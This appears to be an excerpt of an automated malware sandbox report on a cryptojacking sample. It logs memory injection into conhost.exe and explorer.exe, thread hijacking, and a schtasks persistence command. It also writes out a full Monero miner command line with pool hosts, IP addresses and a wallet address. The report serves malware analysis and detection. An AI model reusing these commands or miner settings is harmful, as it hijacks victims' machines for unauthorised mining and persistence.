Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Memory written: C:\Windows\System32\conhost.exe base: 16CC3390000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140000000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140001000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140367000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 1404A0000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140753000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140775000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140776000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140777000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140779000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 14077B000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 14077C000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 14077D000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: DB8010
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Memory allocated: C:\Windows\System32\conhost.exe base: 25F5EDE0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\services64.exe Memory allocated: C:\Windows\System32\conhost.exe base: 2C94E0E0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\services64.exe Memory allocated: C:\Windows\System32\conhost.exe base: 2A780EE0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Memory allocated: C:\Windows\System32\conhost.exe base: 16CC3390000 protect: page execute and read and write
Injects a PE file into foreign processes
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140000000 value starts with: 4D5A
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 140000000 value: 4D
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 140001000 value: 48
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 140367000 value: 1E
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 1404A0000 value: F0
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 140753000 value: 00
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 140775000 value: 48
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 140776000 value: C5
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 140777000 value: 48
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 140779000 value: 48
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 14077B000 value: 60
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 14077C000 value: 00
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 14077D000 value: 00
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 886010 value: 00
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 140000000 value: 4D
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 140001000 value: 48
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 140367000 value: 1E
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 1404A0000 value: F0
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 140753000 value: 00
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 140775000 value: 48
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 140776000 value: C5
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 140777000 value: 48
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 140779000 value: 48
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 14077B000 value: 60
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 14077C000 value: 00
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 14077D000 value: 00
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: DB8010 value: 00
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\conhost.exe Thread register set: target process: 6764
Source: C:\Windows\System32\conhost.exe Thread register set: target process: 6784
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Thread created: C:\Windows\System32\conhost.exe EIP: 5EDE0000
Source: C:\Users\user\AppData\Local\Temp\services64.exe Thread created: C:\Windows\System32\conhost.exe EIP: 4E0E0000
Source: C:\Users\user\AppData\Local\Temp\services64.exe Thread created: C:\Windows\System32\conhost.exe EIP: 80EE0000
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Thread created: C:\Windows\System32\conhost.exe EIP: C3390000
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\Desktop\pcNCraWcRk.exe'
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe 'cmd' cmd /c 'C:\Users\user\AppData\Local\Temp\services64.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
Source: C:\Windows\System32\conhost.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe 'C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe'
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' '/sihost64'
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
Source: conhost.exe, 00000001.00000000.666772202.0000025F5F800000.00000002.00020000.sdmp, conhost.exe, 00000009.00000000.681287377.000002C94EBC0000.00000002.00020000.sdmp, conhost.exe, 0000000F.00000000.688171631.000002A781950000.00000002.00020000.sdmp, conhost.exe, 00000010.00000000.688097653.0000016CC39E0000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: conhost.exe, 00000001.00000000.666772202.0000025F5F800000.00000002.00020000.sdmp, conhost.exe, 00000009.00000000.681287377.000002C94EBC0000.00000002.00020000.sdmp, conhost.exe, 0000000F.00000000.688171631.000002A781950000.00000002.00020000.sdmp, conhost.exe, 00000010.00000000.688097653.0000016CC39E0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000001.00000000.666772202.0000025F5F800000.00000002.00020000.sdmp, conhost.exe, 00000009.00000000.681287377.000002C94EBC0000.00000002.00020000.sdmp, conhost.exe, 0000000F.00000000.688171631.000002A781950000.00000002.00020000.sdmp, conhost.exe, 00000010.00000000.688097653.0000016CC39E0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: conhost.exe, 00000001.00000000.666772202.0000025F5F800000.00000002.00020000.sdmp, conhost.exe, 00000009.00000000.681287377.000002C94EBC0000.00000002.00020000.sdmp, conhost.exe, 0000000F.00000000.688171631.000002A781950000.00000002.00020000.sdmp, conhost.exe, 00000010.00000000.688097653.0000016CC39E0000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number, etc.) of a device
Source: C:\Windows\System32\conhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\conhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation